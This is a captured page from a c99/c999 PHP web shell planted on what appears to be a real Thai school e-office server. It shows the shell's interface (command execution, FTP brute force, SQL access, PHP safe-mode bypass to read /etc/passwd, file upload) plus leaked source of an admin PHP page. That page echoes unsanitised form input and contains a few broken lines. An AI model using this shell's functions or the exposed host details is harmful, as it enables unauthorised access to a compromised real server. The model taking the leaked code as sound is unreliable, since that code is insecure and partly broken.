!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/eoffice/admin/   drwxr-xr-x
Free 50.89 GB of 127.8 GB (39.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     deptpop1.php (3.99 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../class/clsTable.php";
include_once 
"../class/clsDepartment.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDp2 = new Department($oC);
$oDp = new Department($oC);

?>
<script language="JavaScript1.2">
function checkFormat(){
    var xv = 0;
    if(document.ps.deptName.value==""){
        alert("กรุณากรอกชื่อส่วนราชการภายใน!");
        xv = 1;
        return false;
    }
}
</script>
<? 
//echo ">>".$startyear;
if($method=="add" && $xv != 1){ 

    
//$oC->BeginTrans();
            
$oDp->AddNew();
            
$oDp->deptId=$oDp->GetNextCode();
            
$oDp->deptName=$deptName;
            
$oDp->deptDesc=$deptDesc;
            
$oDp->deptCode=$deptCode;
            
$oDp->deptParent=0;
            
$oDp->deptYear=(date(Y)+543);
            
            
$oDp->deptDate=getNowDateTh();
            
            
$oDp->deptRef=0;
            
$oDp->pbriId=0;
            
$oDp->deptIsCenter="";
            
$oDp->receiveIn="Y";
            
$oDp->receiveOut="";
            
$oDp->sendIn="Y";
            
$oDp->sendOut="Y";
            
$oDp->deptNo=""
            
$oDp->docGroup="";
             
$maxnext=$oDp->SearchMaxDocGroup();
             
$oDp->docGroup=($maxnext);
             
$oDp->deptParentId=$deptParentId;
             
$oDp->deptLevel=$deptLevel;
             
$oDp->deptgroup $dg;
             
$oDp->Save();
                    
?>
<script language="javascript1.2">
window.opener.location.href="addWorkGroup2.php";
window.close();
</script>
<?php    
}
?>
<html>
<head>
<title>เพิ่มส่วนราชการภายใน</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
<style>
<!--
A:link {text-decoration: none }
A:visited {text-decoration: none}
A:hover {text-decoration: none; font-weight: underline}
-->
</style>
</head>
<body bgcolor="#FFFFFF">
<form name="ps" action="<?php echo $PHP_SELF;?>" method="post" >
<table width="100%" border="0" cellspacing="1" cellpadding="1" align="center">
    <tr > 
        <td align="center" colspan="4" height="22"><br><font size="3" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"><b>เพิ่มส่วนราชการภายใน</b></font></td>
    </tr>
                                <tr>
                                    <td colspan="4" height="22"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">&nbsp;</font></td>
                                </tr>
                                <tr height="22" >
                                    <td align="left"  ><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>ชื่อส่วนราชการภายใน</b></font></td>
                                    <td align="left" >&nbsp;</td>
                                    <td align="left"><input type="text" name="deptName" size="40" value="<? echo $deptName?>">
                                    <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>">*</font></td>
                                </tr>
                                <tr height="22" >
                                    <td align="left"  ><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>รายละเอียด</b></font></td>
                                    <td align="left" >&nbsp;</td>
                                    <td align="left"><input type="text" name="deptDesc" size="40" value="<? echo $deptDesc?>">
                                    &nbsp;</td>
                                </tr>
                                <tr>
                                    <td align="left" colspan="4" height="22"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b>&nbsp;</b></font></td>
                                </tr>
<tr>
        <td colspan="4" align="center" bgcolor="#FFFFFF"><input type="submit" name="add" value="บันทึก" onClick="return checkFormat()">
          <input type="reset" name="clear" value="เคลียร์ข้อมูล">
        <input type="hidden" name="method" value="add">
        </td>
    </tr>
        <input type="hidden" name="deptParentId" value="<?php echo $deptParentId;?>">
        <input type="hidden" name="deptLevel" value="<?php echo $deptLevel;?>">
        <input type="hidden" name="startyear" value="<?php echo $startyear;?>">
        <input type="hidden" name="endyear" value="<?php echo $endyear;?>">
        <input type="hidden" name="dg" value="<?php echo $dg;?>">
    <tr><td colspan="4" align="center"><a href="#" onClick="window.close()"><font size="1" face="Microsoft Sans Serif">[ปิดหน้าต่าง]</font></a></td></tr>
</table>
</form>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--